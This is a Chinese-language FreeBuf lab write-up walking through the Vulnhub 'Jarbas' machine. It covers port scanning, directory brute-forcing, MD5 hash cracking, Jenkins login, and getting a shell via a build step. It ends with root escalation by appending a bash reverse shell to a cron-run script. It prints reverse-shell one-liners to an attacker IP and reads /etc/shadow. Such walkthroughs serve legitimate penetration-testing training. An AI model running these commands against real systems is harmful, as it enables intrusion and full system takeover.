freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

Vulnhub靶机实操笔记-JARBAS
2023-05-30 14:31:29
所属地 北京

一、Namp扫描

1、主机存活判断

sudo nmap -sn 192.168.32.0/24

1685425270_64758c76aebb61fca3f47.png!small?1685425271221

2、快速扫描

以不低于1w的速度快速扫描端口

sudo nmap --min-rate 10000 -p- 192.168.32.135

1685425293_64758c8d060ed64d7c4ce.png!small?1685425293250

使用TCP和UDP的形式对扫出的端口进行协议的查看

3、TCP扫描

sudo nmap -sT -sV -O -p22,80,3306,8080 192.168.32.135

1685425309_64758c9dee2d98ae28764.png!small?1685425310265

4、UDP扫描

sudo nmap -sU -p22,80,3306,8080 192.168.32.135

1685425324_64758cac8f4348ba8db79.png!small?1685425325216

5、Namp的POC扫描

sudo nmap --script=vuln -p22,80,3306,8080 192.168.32.135

1685425343_64758cbf3e52ef93e8d5b.png!small?1685425343743

二、目录爆破

访问80端口到WEB页面

1685425368_64758cd8eef8f90fe8593.png!small?1685425369341

访问8080端口来到了登陆页面

1685425387_64758cebc27b0de2e6cd2.png!small?1685425387928

先对80端口目录爆破

sudo gobuster dir -u http://192.168.32.135 -x txt,jsp,php,zip,sql,html -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt

1685425405_64758cfdecea2bcdad70e.png!small?1685425406412

访问扫描到的access.html提示这是一个安全的凭据,我们吧这些拿去识别解密一下

1685425421_64758d0d37257be8f5de8.png!small?1685425422271

1、hash-identifier 识别

当不知道当前hash编码方式是什么时可以利用hash-identifier

hash-identifier '带检测编码'

hash-identifier '5978a63b4654c73c60fa24f836386d87' 
hash-identifier 'f463f63616cb3f1e81ce46b39f882fd5' 
hash-identifier '9b38e2b1e8b12f426b0d208a7ab6cb98'

1685425440_64758d200973d659b679d.png!small?1685425440403

1685425455_64758d2f0432c5c88f9f3.png!small?1685425455486

1685425474_64758d4268d7d4ce95d6c.png!small?1685425474734

2、解密

通过在线md5解密网站解出来了对应的值,谷歌浏览器搜md5 crack

对“:”后面的编码进行解密

1685425491_64758d539e6dceaf5288d.png!small?1685425492205

https://hashes.com/zh/decrypt/hash

1685425506_64758d6232da4b5103986.png!small?1685425506519

三、Jenkins利用

1、登陆Jenkins

通过前面解密得到的密码,尝试账户密码的登陆爆破尝试

最终eder/vipsu登陆系统

1685425526_64758d7652f0c92ea78a5.png!small?1685425526629

2、Jenkins拿shell

1、新建项目

选择freestyle project

1685425683_64758e139067202e06c96.png!small

1685425720_64758e38a987277a6b657.png!small?1685425722894

2、尝试反弹shell

下拉菜单第一项,执行windows批处理命令;第二项执行shell

1685425739_64758e4b6ab5ffab85d5b.png!small?1685425740581

选择第二项执行shell,并写入shell命令

/bin/bash -i >& /dev/tcp/192.168.32.131/1234 0>&1

1685425767_64758e677bce46686ba68.png!small?1685425767834

3、监听端口

1685425798_64758e866b48a9f30c952.png!small?1685425798556

4、执行项目

点击build now执行项目

1685425815_64758e971beba89a087d9.png!small?1685425815634

5、获得shell

1685425832_64758ea84ccb1ba3a981f.png!small?1685425832689

四、内网提权

1、系统详情

uname -a   #显示系统名、节点名称、操作系统的发行版号、内核版本等等

1685425847_64758eb7288ebf7bed233.png!small?1685425847591

2、查看当前系统权限

sudo -l

从结果来看用户是没有任何权限的

1685425861_64758ec5492b94da82c01.png!small?1685425861578

3、查看系统用户信息

cat /etc/passwd
cat /etc/shadow

1685425876_64758ed41d725089ef2cc.png!small?1685425876829

4、查看定时任务

cat /etc/crontab    #较为常用
cat /etc/cron.d     #比较少用

可以看到箭头处,每五分钟以root的权限去执行CleaningScript.sh这个shell脚本,执行结果是将所有结果丢掉

1685425891_64758ee3d3066b521c347.png!small?1685425892286

5、修改计划任务提权

cat /etc/script/CleaningScript.sh   #查看脚本内容
ls -lia /etc/script/CleaningScript.sh  #查看对sh文件的权限
echo "/bin/bash -i >& /dev/tcp/192.168.32.131/4443 0>&1" >> /etc/script/CleaningScript.sh
#续写文件CleaningScript.sh将反弹shell命令续写入计划任务脚本内

1685425931_64758f0b072687c805f7b.png!small?1685425931263

1685425945_64758f1985a50f11c0571.png!small?1685425946152

1685425961_64758f295c863b21ef0a5.png!small?1685425961708

6、实战补充点--查看ssh是否允许远程登录

查看ssh是否允许远程登录/etc/ssh/sshd_config,查找 #PermitRootLogin 行,如果想允许 root 用户远程登录,将该行的注释符号 # 去掉,并将参数设置为 yes,即 PermitRootLogin yes。如果想禁止 root 用户远程登录,将参数设置为 no,即 PermitRootLogin no。

/etc/ssh/sshd_config

1685425989_64758f459ca03acb30b8c.png!small?1685425990109

五、靶场下载链接

https://download.vulnhub.com/jarbas/Jarbas.zip

# 提权 # 内网提权 # vulnhub靶机 # 靶场实战 # 靶场攻关
本文为 独立观点,未经允许不得转载,授权请联系FreeBuf客服小蜜蜂,微信:freebee2022
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
  • 0 文章数
  • 0 关注者
文章目录